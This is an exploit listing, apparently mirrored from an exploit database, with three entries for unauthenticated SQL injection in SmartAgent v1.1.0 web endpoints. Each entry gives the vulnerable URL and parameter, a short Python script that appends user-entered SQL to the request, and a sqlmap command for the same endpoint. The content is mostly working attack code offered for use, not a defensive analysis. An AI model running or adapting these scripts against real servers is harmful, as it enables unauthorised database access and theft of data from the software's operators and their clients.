Share
## https://sploitus.com/exploit?id=PACKETSTORM:182449
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php.  
  
The POST request includes the folowing parameters "action=exportNetworkDate&id=1111" and vulnerable parameter is "id".  
  
  
Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smartagent.[client].com/privateArea/common/tests/interface.php"  
sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ")  
  
postdata = {  
"action": "exportNetworkDate",  
"id": "1111" + sqlcommand  
}  
  
response = requests.post(url, data=postdata, verify=False)  
print(response.text)  
  
  
2. Alternatively SQLMAP could pe used on the same endpoint   
  
sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data "action=exportNetworkDate&id=1111" -p "id"  
  
  
  
  
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123.  
  
The GET request includes the vulnerable parameter "id".  
  
  
Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php"  
sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ")  
  
parameter = {  
"id": "123" + sqlcommand  
}  
  
response = requests.get(url, data=parameter, verify=False)  
print(response.text)  
  
  
2. Alternatively SQLMAP could pe used on the same endpoint   
  
sqlmap -u https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p "id"  
  
  
  
  
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111.  
  
The GET request includes the vulnerable parameter "client".  
  
  
Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smartagent.[client].com/recuperaLog.php"  
sqlcommand = input("Enter the command you want to run \(EX: UNION SELECT @@version\): ")  
  
parameter = {  
"client": "1111" + sqlcommand  
}  
  
response = requests.get(url, data=parameter, verify=False)  
print(response.text)  
  
  
2. Alternatively SQLMAP could pe used on the same endpoint   
  
sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p "client"